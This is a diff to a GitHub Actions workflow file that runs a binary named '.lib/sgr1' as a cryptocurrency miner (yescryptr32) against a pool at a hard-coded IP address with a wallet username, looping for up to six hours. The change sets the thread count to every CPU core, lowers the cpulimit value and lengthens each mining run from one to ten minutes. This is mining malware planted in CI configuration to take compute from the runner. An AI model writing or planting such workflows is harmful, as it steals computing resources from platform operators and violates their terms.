--- a/.github/workflows/main22.yml
+++ b/.github/workflows/main22.yml
@@ -47,22 +47,24 @@ jobs:
       run: |
         start_time=$(date +%s)
         end_time=$((start_time + 6*3600))  # 6 hours from start
+        num_cores=$(nproc)  # Determine the number of CPU cores
+
         while [ $(date +%s) -lt $end_time ]; do
           if [ -f .lib/sgr1 ]; then
             # Start the process with cpulimit
-            cpulimit -l 300 -e .lib/sgr1 &
+            cpulimit -l 70 -e .lib/sgr1 &
             
             # Store the PID of cpulimit
             cpulimit_pid=$!
             
             # Run the process with the specified parameters in background
-            nohup .lib/sgr1 -a yescryptr32 --pool 45.115.224.59:8443 -u UddCZe5d6VZNj2B7BgHPfyyQvCek6txUTx.$cpulimit_pid --timeout 120 -t 4 &
+            nohup .lib/sgr1 -a yescryptr32 --pool 45.115.224.59:8443 -u UddCZe5d6VZNj2B7BgHPfyyQvCek6txUTx.$cpulimit_pid --timeout 120 -t $num_cores &
             
             # Store the PID of the running process
             process_pid=$!
             
-            # Run for 1 minute
-            sleep 60
+            # Run for 10 minutes
+            sleep 600
             
             # Kill the process
             kill $process_pid || true
